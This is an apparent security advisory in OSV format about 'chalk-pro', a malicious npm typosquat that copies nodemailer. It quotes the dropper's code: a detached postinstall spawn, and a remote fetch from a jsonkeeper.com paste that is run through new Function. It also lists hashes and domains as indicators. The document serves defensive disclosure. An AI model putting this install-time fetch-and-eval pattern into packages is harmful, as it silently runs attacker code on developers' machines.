{"id":"MAL-2026-5711","summary":"Malicious code in chalk-pro (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce)\nPackage is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs `node lib/utils/index.js`, which uses `child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] })` followed by `child.unref()` to launch `lib/utils/smtp-connection/index.js` as a detached, fully-silenced child so `npm install` returns immediately while the dropper continues in the background. The dropper executes `require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r =\u003e new Function('require', r.data.cookie)(require))` — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with `new Function` at install time, with full access to `require`. A second file (`lib/utils/smtp-connection/parse.js`) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. This is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.\n","modified":"2026-06-16T23:16:57.949188211Z","published":"2026-06-12T20:36:57Z","database_specific":{"malicious-packages-origins":[{"versions":["7.0.4"],"import_time":"2026-06-12T20:49:38.118064947Z","sha256":"ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce","id":"IN-MAL-2026-006231","modified_time":"2026-06-12T20:36:57Z","source":"amazon-inspector"},{"versions":["7.0.4"],"import_time":"2026-06-12T20:49:38.195698931Z","id":"IN-MAL-2026-006232","sha256":"d6015370f610f4d4581119093958e05171cac46e967b97725e8e3ed42dad9070","modified_time":"2026-06-12T20:36:58Z","source":"amazon-inspector"},{"versions":["7.0.6"],"import_time":"2026-06-16T23:03:43.140780104Z","sha256":"75bcaaf15fbc593bdf034886186f961d37758a21b9feca9c18c37338c8af34dc","id":"IN-MAL-2026-006840","modified_time":"2026-06-16T22:17:58Z","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/chalk-pro/v/7.0.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/chalk-pro/v/7.0.6"}],"affected":[{"package":{"name":"chalk-pro","ecosystem":"npm","purl":"pkg:npm/chalk-pro"},"versions":["7.0.4","7.0.6"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk-pro/MAL-2026-5711.json","indicators":{"package_integrity":[{"hashes":{"sha1":"fd1014b20c77e2d2b536d8dcef0187a949438318","sha512_sri":"sha512-m0gHULuyqRGU+Z2ZkyFuCDJD0YUUoENkKlzk5lY1tt97m7zFVP+79dhp4gTNtwyZ0orut7rgi+lEBNGNEWTmbg=="},"filename":"chalk-pro-7.0.4.tgz"}],"domains":["github.com","release-assets.githubusercontent.com","www.jsonkeeper.com"],"evidence_files":[{"sha256":"1177ef44c40c048428ad64bebb0781fdf8ec303a3a4941c225efc143a54d0798","tlsh":"09e026a223e0612e223519e593060067b007c5616b6ae8c6c3585af226c1fd58e23df9","path":"lib/utils/smtp-connection/index.js"},{"sha256":"9fb27c30f484650bb4a39f65a03fbccdc0b9b5f1cb84700ca73ee8893c66e06e","tlsh":"dae0686a23533738a034cbc1da30ce3b258b8020b365a0e0f00c406a2bc72c406ea8da","path":"lib/utils/index.js"},{"sha256":"2b849087b5db4e7663811977e549e5cb0a76d2b3d36c1b8e0e845a45e835a6c4","tlsh":"1041fc15cd268ce3279929edb86d0183b530d00f8d09b85db74c938c4f8e99f76b8a6d","path":"package.json"},{"sha256":"4aac106a4f36aba6433c7ded453d724307ee55616e240883cd46204549cf24b1","tlsh":"7cf0a6802cb8fb900345b0e7c0bbeb07a198a068312287a48a8f9d5a45868488a130dd","path":"lib/utils/smtp-connection/parse.js"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}